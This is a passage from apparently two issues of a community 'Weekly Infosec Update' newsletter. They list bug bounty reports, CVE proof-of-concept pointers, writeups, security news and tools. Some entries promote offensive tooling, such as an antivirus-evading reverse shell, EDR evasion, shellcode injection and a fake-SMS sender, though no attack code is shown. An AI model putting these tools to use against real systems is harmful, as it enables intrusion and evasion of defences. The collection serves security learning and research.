Multiple CVE in TENDA, CVE-2022-24787, CVE-2022-33318, CVE-2022-2884, CVE-2022-26377, \n                        CVE-2020-2733 and CVE-2022-30129. \n      \n### 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞\n\n   *1. In This Segment, We have filtered out **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n    \n   -  [$4000 Pause-based desync in Apache HTTP Server 2.4.52 and earlier (CVE-2022-22720)](https://hackerone.com/reports/1667974) fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling.\n   -  [Privilege Escalation - \"Analyst\" Role Can View Email Domains of a Company - [GET /voyager/api/voyagerOrganizationDashEmailDomainMappings]](https://hackerone.com/reports/1572591)\n \n  *2. 
In This Segment We Collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES:** *\n    \n   - [$4,000 Command Injection in the GitHub Pages Build Pipeline](https://blog.nietaanraken.nl/posts/github-pages-command-injection/)\n   - [Somdev Sangwan - Hacking ModSecurity  leads to WAF bypass, Code injection and RCE](https://s0md3v.github.io/blog/modsecurity-rce-bypass)\n   - [€1500 - Break the Logic: 5 Different Perspectives in Single Page](https://infosecwriteups.com/break-the-logic-5-different-perspectives-in-single-page-1500-5aa09da0fe7a)\n   - [rez0 reference for why IDORs with unpredictable IDs are valid vulnerabilities](https://rez0.blog/hacking/cybersecurity/2022/08/18/unpredictable-idors.html)\n   - [Bypassing Amazon WAF to pop an alert()](https://infosecwriteups.com/bypassing-amazon-waf-to-pop-an-alert-4646ce35554e)\n   - [Out-Of-Bond Remote code Execution(RCE) on De Nederlandsche Bank N.V. with burp-suite collaborator](https://infosecwriteups.com/out-of-bond-remote-code-execution-rce-on-de-nederlandsche-bank-n-v-with-burp-suite-collaborator-2ce50260e2e4)\n   - [a simple IDOR + Authorization vulnerability](https://monish-basaniwal.medium.com/the-million-dollar-hack-8163892bfe2f) to expose thousands of Visa gift cards on a leading gift card company’s website + Bonus: Found a way to redeem them more than once.\n   - [Bug Hunting Search Engine- A community curated resources for bug bounty hunting](https://bugbountyhunting.com)\n   \n\n### 🥇🥈🥉 OUR 6 FAVORITE FROM INFOSEC : article, whitepaper & statistics report 🥇🥈🥉\n  \n - [Google announces launching Google’s Open Source Software Vulnerability Rewards Program (OSS VRP) to reward discoveries of vulnerabilities in Google’s open source projects](https://security.googleblog.com/2023/08/Announcing-Googles-Open-Source-Software-Vulnerability-Rewards-Program%20.html?m=1). 
As the maintainer of major projects such as Golang, Angular, and Fuchsia, Google is among the largest contributors and users of open source in the world. With the addition of Google’s OSS VRP to our family of Vulnerability Reward Programs (VRPs), researchers can now be rewarded for finding bugs that could potentially impact the entire open source ecosystem.\n - [API vulnerabilities discovered and exploited in Q1-2022](https://drive.google.com/file/d/1MuOdfTDC6VRbNKnvHS1jYeOHfoEOi_Ci/view?usp=sharing)\n - [Twitter Whistleblower Document Archive](https://archive.org/download/whistleblower_disclosure)\n - [$100,000 Attacking the Mozilla Firefox Renderer : Browser bug, RCE (Part 2)](https://www.zerodayinitiative.com/blog/2022/8/23/but-you-told-me-you-were-safe-attacking-the-mozilla-firefox-renderer-part-2)\n - [Cujanovic : SSRF (Server Side Request Forgery) testing resources](https://github.com/cujanovic/SSRF-Testing)\n - [Eavesdropping: €8,000,000 does it cost to buy Predator spyware ?](https://www.secnews.gr/417192/ipoklopes-agora-predator-spyware/)\n---\n### 🐦🐦🐦 TWITTER THREAD & TIPS 🐦🐦🐦\n \n  - [Detectify shared a thread for Latest CVE submission on their Attack surface platform](https://twitter.com/detectify/status/1564285800086380545?t=V8lXKxykl1rrRZ0gNwBv_A&s=19).\n  - [Rapid Api shared a thread on what exactly is CORS?](https://twitter.com/Rapid_API/status/1564621466620018690?t=5acaUewayJaLGyG_7R8fPw&s=19)\n  - [Backdoor password in a ZIP!](https://twitter.com/_mohemiv/status/1561044393880178689) \n             \n             🔴If you create a compressed file with the following command: 7z a x.zip 1.png -mem=AES256 -p\n              Next, enter the following password (the password will not be shown):\n              Nev1r-G0nna-G2ve-Y8u-Up-N5v1r-G1nna-Let-Y4u-D1wn-N8v4r-G5nna-D0sert-You\n\n              Now decompress the file with the following command and password:\n              7z e x.zip\n\n              and the following password:\n              
pkH8a0AqNbHcdw8GrmSp\n ---\n\n### 🔍🔍🔍 RESEARCHERS, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n  **This is one of the best segments if you are a researcher and want to explore security, new approaches to finding vulnerabilities, and the infosec business in depth.** If you're a beginner bug hunter or junior pentester, you can skip this section.\n  \n - **1 - Web Security, cloud misconfiguration and android security**\n   - [API test environment](https://www.getsecureworld.com/blog/what-are-the-api-pentest-requirements/) This interesting article lists the questions to ask before performing an API pentest.\n   \n   - In this article, Horizon3.ai shares a story in which what at first appeared to be minor “password issues” led to a high-risk attack path enabling NodeZero to [access the domain admin accounts, and even break into the organization’s Azure cloud environment](https://www.horizon3.ai/how-nodezero-found-access-to-azure-environment/).\n   \n   - [Misconfigured Resource-Based Policies - Hacking The Cloud](https://hackingthe.cloud/aws/exploitation/misconfigured_resource-based_policies/)\n   \n   - [Android security checklist - Theft of arbitrary files](https://blog.oversecured.com/Android-security-checklist-theft-of-arbitrary-files/)\n  \n   - [cezary-sec/awesome-browser-security](https://github.com/cezary-sec/awesome-browser-security/) \nA curated list of awesome browser security learning material by Opera’s Cezary Cerekwicki. 
Covers good intro material, security challenges and corresponding mitigations, attacks on browsers, and more.\n\n   - [CSRF Vulnerability In The NodeJS 3rd party popular csurf package](https://fortbridge.co.uk/research/a-csrf-vulnerability-in-the-popular-csurf-package/)\n  \n   - [Chaining Telegram bugs to steal session-related files](https://dphoeniixx.medium.com/chaining-telegram-bugs-to-steal-session-related-files-c90eac4749bd)\n   \n- **2 - Blue/Red/Purple/Threat hunting Team**\n   - [Threat Hunting Tools: Our Recommendations](https://socprime.com/blog/threat-hunting-tools-our-recommendations/)\n   \n   - [Endpoint Security: Intuition around the Mudge Disclosures](https://medium.com/starting-up-security/endpoint-security-intuition-around-the-mudge-disclosures-dfbe014790f2) \nGreat post by Ryan McGeehan on the core things you should keep in mind about endpoint security, communicating with senior management, risk scenarios, measuring progress, practical realities, and more.\n   \n   - [BlueHound: Community Driven Resilience](https://zeronetworks.com/blog/bluehound-community-driven-resilience/)\nZero Networks’s Dekel Paz describes BlueHound, a tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network.\n   \n   - Hunting for emerging Sliver command-and-control(C2C) frameworks](https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/)\n   \n   - [Guide to DLL Sideloading](https://crypt0ace.github.io/posts/DLL-Sideloading/) \nDLL Sideloading is a technique related to DLL Hijacking.\n\n   - [Hacking WatchGuard firewalls with vulnerability XPath injection, Memory corruption bug, Local Privilege Escalation and RCE](https://www.ambionics.io/blog/hacking-watchguard-firewalls). 
This article goes into depth on how Ambionics Security discovered 5 vulnerabilities - 2 patched along the way - built 8 distinct exploits, and finally obtained an unpatched pre-authentication remote root 0-day on every WatchGuard Firebox/XTM appliance.\n \n   - [How Hackers Exploit Exposed Default Welcome Page](https://blog.criminalip.io/2022/08/24/default-welcome-page-exposure/) By searching with the common keywords for default welcome pages, one can easily find exposed default welcome pages on the vulnerable open web.\n \n  - [Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion (Part 2)](https://bohops.com/2022/08/22/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion-part-2/)\n\n  - [On Cryptocurrency Wallet Design – defines access control taxonomy, can be reused e.g. for MFA factors](https://eprint.iacr.org/2021/1522.pdf)\n \n - **4 - Infosec Business** \n\n   - In this article, Haider Mahmood talks about an [Information Security Checklist for Small to Medium Organizations](https://haiderm.com/information-security-checklist-for-small-to-medium-organizations/)\n\n   - In this article the author (nozaq) shares his experience in detail: [The to-do list for terminating a payment service](https://engineering.mercari.com/en/blog/entry/20201219-6e7ea87db8/)\n\n   - In this article, [Godric Cao shares his experience when it comes to organizational design](https://engineering.mercari.com/en/blog/entry/20211225-size-backend-team-to-5-to-8-members/) and factors such as the company’s current phase, efforts to adjust team sizes that impact team performance, organization and individual growth paths, etc. 
\n\n---\n\n### 📰📰📰 NEWS 📰📰📰\n\n- **Leaks & BlackHat Hacker:**\n  \n   - [🟢Data-Leak:LastPass hacked and stolen source code, blueprints of company by intruder](https://www.theregister.com/2022/08/25/lastpass_security/) 🔴Hacking was done by hacking the account of a developer and through that hackers were able to penetrate the development environment inside the company.\n   - [🟢Explained: The General Bytes Bitcoin ATM Hack (August 2022)](https://halborn.com/explained-the-general-bytes-bitcoin-atm-hack-august-2022/)\n   - [🟢ÆPIC Leak: Architecturally Leaking Uninitialized Data from the Microarchitecture](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n\n- **Top 5 Infosec News:**\n   - [🟢 80,000 Hikvision cameras vulnerable with CVE-2021-36260](https://www.bleepingcomputer.com/news/security/over-80-000-exploitable-hikvision-cameras-exposed-online/) 🔴If you operate a Hikvision camera, you should make it a priority to install the latest available firmware update, use a strong password, and isolate the IoT network from critical assets using a firewall or VLAN.\n   - [🟢 Ex-Twitter exec blows the whistle, alleging reckless and negligent cybersecurity policies](https://edition.cnn.com/2022/08/23/tech/twitter-whistleblower-peiter-zatko-security/index.html)🔴One of Twitter's former security chiefs named Peiter \"Mudge\" Zatko has revealed in disclosure about the security and privacy of this platform that include Twitter has major security problems that pose a threat to the personal information of its users, company shareholders, national security, and democracy.\n  - [🟢Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts](https://thehackernews.com/2022/08/google-uncovers-tool-used-by-iranian.html?fbclid=IwAR34LikXAB8_osmMVauu0jAZuDRPbGKkfQRG-fcc2lWnOXZLjO49y3kqmws)\n  - [🟢NATO investigating hacker sale of missile firm data](https://www.bbc.co.uk/news/technology-62672184). 
🔴NATO says it's assessing the impact of a breach of classified military documents being sold by a hacker group online, but the source of the documents is murky.\n  - [🟢DuckDuckGo opens its privacy-focused email service to everyone](https://www.bleepingcomputer.com/news/security/duckduckgo-opens-its-privacy-focused-email-service-to-everyone/).\n---\n\n### 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️ \n\n*The community tests the tools and we filter out the most in-demand and helpful tools that suit the hacker's purpose.*\n\n - **1. SAAS/PASS/Recon/Network/Web Pentesting** - 8\n    \n    - [JWT-Reauth - a plugin aims to provide a painless solution to this issue](https://research.nccgroup.com/2022/08/25/tool-release-jwt-reauth/). JWT-Reauth provides Burp with a way to authenticate with a given endpoint, parse out the provided token and then attach it as a header on requests going to a given scope. \n    \n    - [tfsec](https://github.com/aquasecurity/tfsec) -> This community-driven tool is popular for using static analysis of your Terraform code to spot potential misconfigurations across all major cloud providers.\n  \n    - [hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons) -> By Hahwul: A collection of cool tools used by web hackers, grouped by tag and language. Types: Swiss Army Knife, recon, fuzzer, scanner, exploit, utils, etc.\n    \n    - [Vision2 - Nmap's XML result parse and NVD's CPE correlation to search CVE](https://github.com/CoolerVoid/Vision2)\n    \n    - [Rekono](https://github.com/pablosnt/rekono)  -> This tool is popular because it combines other hacking tools and their results to execute complete pentesting processes against a target in an automated way. The findings obtained during the executions will be sent to the user via email or Telegram notifications and can also be imported into Defect-Dojo if advanced vulnerability management is needed. 
\n    \n    - [Jscythe](https://github.com/evilsocket/jscythe) -> Abuse the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code. \n       \n    - [EtwSessionHijacking](https://github.com/ORCx41/EtwSessionHijacking)  -> A Poc on blocking Procmon from monitoring network events.\n      \n    - [ExchangeFinder](https://github.com/mhaskar/ExchangeFinder) -> Find Microsoft Exchange instance for a given domain and identify the exact version.\n      \n - **2. Cloud Security** - 1\n \n     - [How to detect suspicious activity in your AWS account by using private decoy resources](https://aws.amazon.com/blogs/security/how-to-detect-suspicious-activity-in-your-aws-account-by-using-private-decoy-resources/)  ->  AWS’s Maitreya Ranganath and Mark Keating describe how you can create low-cost private decoy AWS resources in your AWS accounts and configure them to generate alerts when they are accessed. See also the awesome [canarytokens.org}(https://canarytokens.org/generate)\n \n - **3. Blue/Red Team, IR and Threat intelligence Tools** - 4\n     \n     - [RedCloud - Comfy & powerful #RedTeam Infrastructure deployment using #Docker](https://github.com/khast3x/Redcloud).  -> It has gain his popularity in Redteam Community because It Harness the cloud's speed for your tools(Metasploit, Empire, GoPhish, vulnerable targets, a fully stacked Kali, and many more). Deploys in minutes. Use and manage it with its polished web interface.\n     \n     - [Deobfuscate Log4Shell payloads with ease](https://github.com/ox-eye/Ox4Shell) .\n -> Since the release of Log4Shell, many tools were created to obfuscate Log4Shell payloads. 
This #Blue Team tool by Oxeye lets you unravel the true contents of obfuscated Log4Shell payloads with ease.\n     \n     - [hoaxshell](https://github.com/t3l3machus/hoaxshell) -> An unconventional Windows reverse shell, currently undetected by Microsoft Defender and various other AV solutions, based solely on http(s) traffic. \n     \n     - [Yarang - YARA New Generation](https://github.com/avast/yarang)  -> yarang is an experiment focused on a new scanning engine for YARA, which is based on compiling a YARA ruleset into native code and exposing a C API in order to use it anywhere. It uses Hyperscan under the hood as a pattern matcher instead of the custom Aho-Corasick implementation which YARA rolls.\n  \n - **4. OSINT Tools** - 3\n     \n     - [Geogramint](https://github.com/Alb-310/Geogramint)  -> An OSINT geolocalization tool for Telegram that finds nearby users and groups.\n     \n     - [Moriarty-Project](https://github.com/AzizKpln/Moriarty-Project) -> This tool gives information about the phone number that you entered.\n     \n     - [fake-sms](https://github.com/machine1337/fake-sms)  -> Features that make this tool interesting include anonymous SMS, easy & super fast SMS sending, international SMS sending, and no charges on sending SMS, but with one limitation: you can send only one SMS per day.\n  \n  - **5. IoT, OS & Hardware** - 2 \n      \n      - [Titan M tools](https://github.com/quarkslab/titanm) -> Attack on Google Titan M, Reloaded: Vulnerability Research on a Modern Security Chip\n      \n      - [Tangled WinExec](https://github.com/daem0nc0re/TangledWinExec)  -> This repository is for investigation of Windows process execution techniques. Most of the PoCs are given a name corresponding to the technique.\n\n---\n \n### 🤝🤝🤝 How to get involved in Contribution. 
#Contact-Us 🤝🤝🤝\n\n<div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=ResetHacker Community\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\n\n    If you quickly want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n    CONTACT \"@Attr1b\" on Telegram or mail us to \"resethackerofficial@gmail.com\" \n    \n    Please write a reason, How do you plan to improve it?\n    \n### I'm so grateful to all the [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) without their Writeups, article, findings and whitepaper [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) would not have been possible.\n\n### I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementSupport.md). Without their support reaching \"Weekly InfoSec Update\" to hacker would not have been possible.\n\n### Wrapping Up\n\n  Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n\n  If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏\n\n  Thanks for reading!\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_05.md",
    "content": " #### Hey Hackers, I hope you’ve been doing well on weekend! \n Here are the Agenda for \"Weekly infosec Update\" v0.4 (31th Aug 2022 - 6th September 2022) \n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n<p align=\"\"> <img src=\"https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat\" alt=\"Pentesting-Bugbounty//ResetCybersecuirty/\" /> </p> \n\n![WIU Agenda 969 540](https://user-images.githubusercontent.com/25515871/189000793-96e05f82-f44f-4d64-8e2f-316181a9b3ae.jpg)\n\nHuge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\nContributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n---\n### Let's start the EVENT recap, and my apology for So much Info. We're finding a way to make it shorter.\n\n**This Week Defcon, BlackHat and RECAP of RSA Conference 2022 was mainly trending in infosec community so We have filtered important Talk, Slides, Tools, Weekly Podcast, Youtube Videos and resources releted to Events, Talks & Webinars for Community.**\n\n - This week [Blackhat 2022 all the slides](https://drive.google.com/drive/mobile/folders/1KHx2rKUEdb53flGUN0mFHRdSdB5PUT4B?fbclid=IwAR1C2Fk3XDPU-ky-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVdrive.google.com/drive/u/0/folders/1-pLHmmyU0GvonWAtL1os2NTmkJLcM4UT) was still trending in the community. 
Enjoy :)\n\n- In case you missed the [\"RSA Conference 2022\"](https://www.linkedin.com/pulse/momentum-cyber-rsa-conference-2022-recap-dino-boukouris/?trackingId=GD4%2Bt20hQSe7k%2BS6TrxVZg%3D%3D), Dino Boukouris wrote a recap.\n\n - @KathanP19 had the opportunity to [interview @devl00p](https://www.youtube.com/watch?v=X72_YzOAc5M&feature=youtu.be), the #1 hacker on the @openbugbounty platform, who has helped fix over 85k bugs.\n\n- Some believe that hacking is about more than using a computer to manipulate a victim's computer, so this video is for them: it uncovers government agencies (especially the CIA) that secretly tested the effects of LSD on humans. [**Mission Mind Control (1979)**](https://www.youtube.com/watch?v=DMH5WgGFxlc):  National Archives and Records Administration - ARC Identifier 37950 / Local Identifier 170.110 - Mission Mind Control - Department of Justice. Drug Enforcement Administration. (07/01/1973 - ).\n\n- Upcoming 𝙀𝙑𝙀𝙉𝙏𝙎:  *SANS Blockchain Security Summit* - Rockville - 31st August, *LogRhythm RhythmWorld 2022* - Denver - 13th-15th September and *SSP Alert Live Washington DC* - 19th-21st September.\n---\n### 🪲🪲🪲 CVE : PoC exploits and CVE analysis 🪲🪲🪲\n\n#### Week -> [31st August - 06 September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md)\n\n**There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited, so in this section, every week, we filter out [CVE PoC exploit and analysis writeups that have higher severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).** If you don't play with CVEs then please skip this section.\n  \n     CVE POC exploit : CVE-2022-1388, CVE-2022-32250 and CVE-2022-2639.\n      \n     CVE Analysis :    CVE-2022-30592, CVE-2021-38297, CVE-2022-31814. 
CVE-2022-21371, CVE-2022-24637, CVE-2022-33174, CVE-2022-1802,                            \n                        CVE-2022-23779, CVE-2022-24637, CVE-2022-35406 and Week#35 of Advisory Week Newsletter.\n      \n### 🐞🐞🐞 BUG BOUNTY : report, vulnerability Writeups and resources 🐞🐞🐞\n\n   *1. In This Segment, We have filtered out **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n    \n   -  [$4000 Pause-based desync in Apache HTTP Server 2.4.52 and earlier (CVE-2022-22720)](https://hackerone.com/reports/1667974) fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling.\n   \n   -  [Privilege Escalation - \"Analyst\" Role Can View Email Domains of a Company - [GET /voyager/api/voyagerOrganizationDashEmailDomainMappings]](https://hackerone.com/reports/1572591)\n \n  *2. In This Segment We Collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES***\n   \n   - $4,000 Command Injection in the [GitHub Pages Build Pipeline](https://blog.nietaanraken.nl/posts/github-pages-command-injection/)\n   - [$1,000 - Developer dumb Mistake lead to Information Disclosure](https://mr23r0.medium.com/the-database-handover-a-dumb-mistake-critical-bug-f73c99e72e40)\n   - [Snap_sec found Log4Shell and RCE on Agorapulse](https://snapsec.co/blog/Log4shell-on-agorapulse/)\n   - [How I \"Hacked\" an Airline Website to get back my luggage: A first-person insight to the story.](https://blog.nandankumar.info/how-i-hacked-an-airline-website-to-get-back-my-luggage-a-first-person-insight-to-the-story)\n   - Microsoft researchers discovered a high-severity flaw [(CVE-2022-28799) in the TikTok Android app, which could have allowed attackers to hijack users’ accounts with a single click ](https://www.microsoft.com/security/blog/2022/08/31/vulnerability-in-tiktok-android-app-could-lead-to-one-click-account-hijacking/) -> In short the exploit utilized JavaScript bridging in order to bypass deeplink verification for 
specifically the Android version of the social network's app.\n   - The YesWeHack blog released [a full and detailed comparison of subdomain enumeration tools](https://blog.yeswehack.com/yeswerhackers/subdomains-tools-review-full-detailed-comparison/)\n     \n---\n\n### 🔍🔍🔍 RESEARCHERS, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n  **This is one of the best segments if you are a researcher, founder or organization and want to explore security, new approaches to finding vulnerabilities and the infosec business in depth.** If you're a beginner bug hunter or junior pentester, you can skip this section.\n  \n - **1 - Web Security and android security**\n     - Thick Client Pentest: [Modern Approaches and Techniques: PART 1](https://infosecwriteups.com/thick-client-pentest-modern-approaches-and-techniques-part-1-7bb0f5f28e8e)\n     - [Linux Audit comes at a cost, is that where BPF steps in?](https://goteleport.com/blog/linux-audit/)\n     - Hashar Mujahid explains [how OAuth 2.0 works and what vulnerabilities can be raised if it is implemented incorrectly. 
PART1](https://infosecwriteups.com/oauth-2-0-introduction-and-exploitation-part-i-explained-by-hashar-mujahid-262f9c59de6c)\n     - Hashar Mujahid [show some techniques that can be used to exploit OAuth 2.0 and possibly allow an attacker to take over the victim's account completely.](https://infosecwriteups.com/exploiting-oauth-authentication-vulnerabilities-part-ii-6c150f492e62)\n     - [Practical guide for Golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)\n     - [What Is a Random Number Generator Attack?](https://halborn.com/what-is-a-random-number-generator-attack/)\n     - whiteoaksecurity released a blog on [Exploiting GraphQL Batching Attacks Using Turbo Intruder](https://www.whiteoaksecurity.com/blog/graphql-batching-attacks-turbo-intruder/)\n     - daniel.haxx released a blog on [curl’s TLS fingerprint](https://daniel.haxx.se/blog/2022/09/02/curls-tls-fingerprint/)\n     - Cloudflare released a blog on [Blocking Kiwifarms](https://blog.cloudflare.com/kiwifarms-blocked/)\n     \n     \n  - **2 - Cloud Security**\n\n     - [How BYOD Could Be Putting Your Company’s Security at Risk](https://ipwithease.com/byod-security-at-risk/)  \n     - [From Onboarding to Offboarding - Securing GitHub Apps Integration](https://www.cidersecurity.io/blog/research/from-onboarding-to-offboarding-securing-github-apps-integration/)\n     - [Open source automated AWS CIS v1.5 benchmark assessment just released by Steampipe.io](https://hub.steampipe.io/mods/turbot/aws_compliance/controls/benchmark.cis_v150)\n     - [Misconfigured Resource-Based Policies - Hacking The Cloud](https://hackingthe.cloud/aws/exploitation/misconfigured_resource-based_policies/)\n     - [OWASP Kubernetes Top Ten](https://owasp.org/www-project-kubernetes-top-ten/)\n     - [How to centralize findings and automate deletion for unused IAM roles [AWS]](https://aws.amazon.com/blogs/security/how-to-centralize-findings-and-automate-deletion-for-unused-iam-roles/)\n   \n- **3 - 
Blue/Red/Purple/Threat hunting Team**\n   - Blue Team\n     - The Strategy of Security team has [analyzed the themes and impact of security incidents and breaches from Verizon's 2022 Data Breach Investigations Report.](https://strategyofsecurity.com/the-strategic-impact-of-verizons-2022-data-breach-investigations-report/)\n     - [Sleeping With Control Flow Guard](https://icebreaker.team/blogs/sleeping-with-control-flow-guard/) -> The authors show that disabling CFG allows an attacker to use sleep obfuscation techniques to evade detection, and additionally walk through the basics of reverse engineering an undocumented struct.\n     - Dirk-jan Mollema discussed an issue he discovered that enabled the use of [SMTP matching (also called soft matching) to synchronize Active Directory (AD) users to Azure AD,](https://www.semperis.com/blog/smtp-matching-abuse-in-azure-ad/) with the goal of hijacking unsynchronized accounts.  \n     \n     - [Creating a Threat Hunting Lab for Free with Graylog](https://www.linkedin.com/pulse/creating-threat-hunting-lab-free-graylog-david-elgut)\n     - [APT-C-08 (Manlinghua) latest remote control component wmRAT analysis briefing](https://mp-weixin-qq-com.translate.goog/s/IZNl6N2K1LUU7e1hT4JeYw?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)\n     - [NSA, CISA, ODNI Release Software Supply Chain Guidance for Developers](https://media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF)\n     - [Defending the expanding Attack surface by Trend Micro](https://www.trendmicro.com/vinfo/us/security/research-and-analysis/threat-reports/roundup/defending-the-expanding-attack-surface-trend-micro-2022-midyear-cybersecurity-report)\n     - [Towards a Tectonic Traffic Shift? 
Investigating Apple’s New Relay Network](https://drive.google.com/file/d/1aHE7CIEaCI59KLKQlxlkP_BmElAccgyf/view?usp=sharing)\n     - [Reviewing macOS Unified Logs](https://www.mandiant.com/resources/blog/reviewing-macos-unified-logs)\n    \n   - Red Team\n     - [Win32 and Kernel abusing techniques for pentesters & red-teamers](https://github.com/matthieu-hackwitharts/Win32_Offensive_Cheatsheet) \n     - [WinAPI and P/Invoke in C#](https://crypt0ace.github.io/posts/WinAPI-and-PInvoke-in-CSharp/) In this blog post @AhmedSher covers the basics of calling Windows API functions from managed code, starting with what managed and unmanaged code actually mean.\n     - [Windows Privilege Escalation (3) — Hack Windows through Weak Service Permissions](https://medium.com/@tinopreter/windows-privilege-escalation-3-weak-service-permissions-45a39a64669f) This is part 3 of @ClementTino's Windows PrivEsc series; part one covers Unquoted Service Paths and part two covers Hijacking DLLs.\n     \n     - [Exploiting GraphQL Batching Attacks Using Turbo Intruder](https://www.whiteoaksecurity.com/blog/graphql-batching-attacks-turbo-intruder/)\n     - [Shellcode Injection Techniques in C#](https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques/) In this blog post @AhmedSher discusses Process Injection in C#.\n\n\n - **4 - Infosec Business, Funding and Market** \n\n    - As a hacker turned entrepreneur, 
I would like to recommend the CYBER SECURITY MARKET research paper by [Strategic Market Research LLP.](https://www.globenewswire.com/news-release/2022/08/25/2504919/0/en/With-9-51-CAGR-Global-Cyber-Security-Market-Size-to-Reach-USD-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA.7B by 2030.\n    \n    - [Dark Reading wrote a summary of the MarketsandMarkets(TM) report](https://www.darkreading.com/vulnerabilities-threats/penetration-testing-market-worth-2-7b-by-2027-marketsandmarkets-tm-report) that highlights the penetration testing market being worth $2.7B by 2027, and more.\n    \n    - [Cyber Security Insurance Market May See a Big Move](https://insurancenewsnet.com/oarticle/cyber-security-insurance-market-may-see-a-big-move-major-giants-axa-beazley-allianz-47)\n    \n    - The Security, Funded newsletter issue #58 by Return on Security shared the Funding Summary for August 22nd, 2022. It mentioned that\n    9 companies raised $29.1M across 9 unique product categories and\n    3 companies were acquired or had a merger event across 3 unique product categories.\n  \n   - @NonConformist made over [$253,584 From YouTube With A Faceless Channel. Here’s How](https://medium.com/@Non_Conformist/i-made-over-253-584-from-youtube-in-2-years-heres-how-60fd6dbf55af)\n---\n\n### 📰📰📰 NEWS 📰📰📰🟢\n- **TWITTER THREAD & TIPS**\n\n    - 🟢 EC-Council announced that [the new C|EH v12 features hands-on learning labs, cyber ranges, certification assessments, cyber competitions, and more; the new learning framework will be released on 7th Sept. 
2022.](https://twitter.com/ECCOUNCIL/status/1566926251352154112?s=20&t=LyCqjfX8g0Vu3Fj-IFhRJg)\n    \n    - 🟢 @MeAsHacker_HNA shared the resources for [How to Get into Bugbounty?](https://twitter.com/MeAsHacker_HNA/status/1564872288981422083?t=pwpion7Ah8di1tdVfOuTzw&s=19)\n    - 🟢 Bugbounty#Tips [How to find a local file read vulnerability based on cookies?](https://twitter.com/_bughunter/status/1566411555901784064?t=-92FYhv1aDIjwIgtP0vvcA&s=19)\n    - 🟢 Nuclei: DhiyaneshDK has shared [15 new AEM templates](https://twitter.com/DhiyaneshDK/status/1565785561222512641?s=20&t=CWlnoDG75W0swpGi48LsrQ)\n\n    - 🟢 @malmoeb shares a thread on [Hunting - automatic logon turned on in Windows.](https://twitter.com/malmoeb/status/1565066146881085442?t=EEhLRZDf4bfgKR3aRuiTGQ&s=19)\n    - 🟢 cyberboy shared a thread on [Blockchain & Smart contract security](https://twitter.com/cyberboyIndia/status/1564953200494489600?t=q-bqvv2exElzPTsa7n1hQA&s=19)\n    - 🟢 [MSSQL Coercer: Coerce a Windows SQL Server to authenticate on an arbitrary machine](https://twitter.com/podalirius_/status/1565001716080189442)\n\n\n- **Leaks & BlackHat Hacker: Source Unknown**\n  \n   - 🔴 The TikTok breach is confirmed by multiple researchers and sources. 
